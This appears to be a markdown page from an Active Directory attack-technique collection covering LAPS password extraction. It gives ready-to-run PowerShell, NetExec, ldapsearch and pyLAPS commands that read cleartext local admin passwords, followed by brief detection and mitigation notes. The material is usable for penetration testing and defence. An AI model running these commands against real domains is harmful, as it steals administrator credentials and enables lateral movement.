attack-72-laps-password-extraction.md (4048B)
1 --- 2 title: "Attack #72 โ LAPS Password Extraction" 3 description: "LAPS (Local Administrator Password Solution) stores unique, randomized local admin passwords in Active Directory attributes (ms-Mcs-AdmPwd for LAPS v1โฆ" 4 category: active-directory 5 subcategory: "Advanced & Post-Exploitation" 6 tags: ["active-directory"] 7 tools: ["NetExec", "ldapsearch", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/๐ท Attack #72 โ LAPS Password Extraction.md" 11 --- 12 # ๐ท Attack #72 โ LAPS Password Extraction 13 14 *** 15 16 ## ๐ How It Works 17 18 LAPS (Local Administrator Password Solution) stores unique, randomized local admin passwords in Active Directory attributes (`ms-Mcs-AdmPwd` for LAPS v1, `msLAPS-Password` / `msLAPS-EncryptedPassword` for LAPS v2) on computer objects. If a user can read these attributes (via ACL misconfiguration or group membership), they can extract the cleartext local admin password for any managed computer. 19 20 *** 21 22 ## โ๏ธ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Read access to LAPS attributes** | Must have `Read ms-Mcs-AdmPwd` or `Read msLAPS-Password` | 27 | **Domain user with delegated LAPS read rights** | Often helpdesk, server admins | 28 29 *** 30 31 ## ๐ป Full Commands 32 33 ```powershell 34 # โโ Check who can read LAPS passwords โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 35 Find-AdmPwdExtendedRights -Identity "OU=Servers,DC=corp,DC=local" 36 37 # โโ Read LAPS password (LAPS v1) โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 38 Get-ADComputer TARGET -Properties ms-Mcs-AdmPwd | Select Name,ms-Mcs-AdmPwd 39 40 # โโ LAPS v2 โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 41 Get-LapsADPassword -Identity TARGET -AsPlainText 42 43 # โโ PowerView โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 44 Get-DomainComputer TARGET -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime 45 ``` 46 47 ```bash 48 # โโ NetExec โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 49 nxc ldap DC01.corp.local -u low_user -p 'Password1' --module laps 50 51 # Or smb: 52 nxc smb DC01.corp.local -u low_user -p 'Password1' --laps 53 54 # โโ ldapsearch โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 55 ldapsearch -x -H ldap://DC01.corp.local -D "low_user@corp.local" -w 'Password1' \ 56 -b "DC=corp,DC=local" "(ms-Mcs-AdmPwd=*)" ms-Mcs-AdmPwd 57 58 # โโ pyLAPS โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ 59 python3 pyLAPS.py --action get -d corp.local -u low_user -p 'Password1' --dc-ip 10.10.10.10 60 ``` 61 62 *** 63 64 ## ๐ก๏ธ Detection โ Event IDs 65 66 | Event ID | Source | What to Look For | 67 |---|---|---| 68 | **4662** | Security Log (DC) | Read access to ms-Mcs-AdmPwd attribute | 69 | **Audit** | AD DS | Track who queries LAPS password attributes | 70 71 *** 72 73 ## ๐ Attack Chain Context 74 75 ``` 76 [LAPS] โโโ Read local admin passwords from AD attributes 77 โ 78 โโโโ ๐ Each computer has unique local admin password 79 โโโโ ๐ Password โ local admin โ credential dumping โ lateral movement 80 โโโโ ๐ Defeated by: restrict LAPS read delegation, audit access 81 ``` 82 83 *** 84 85 > โ **Attack #72 โ LAPS Password Extraction complete.**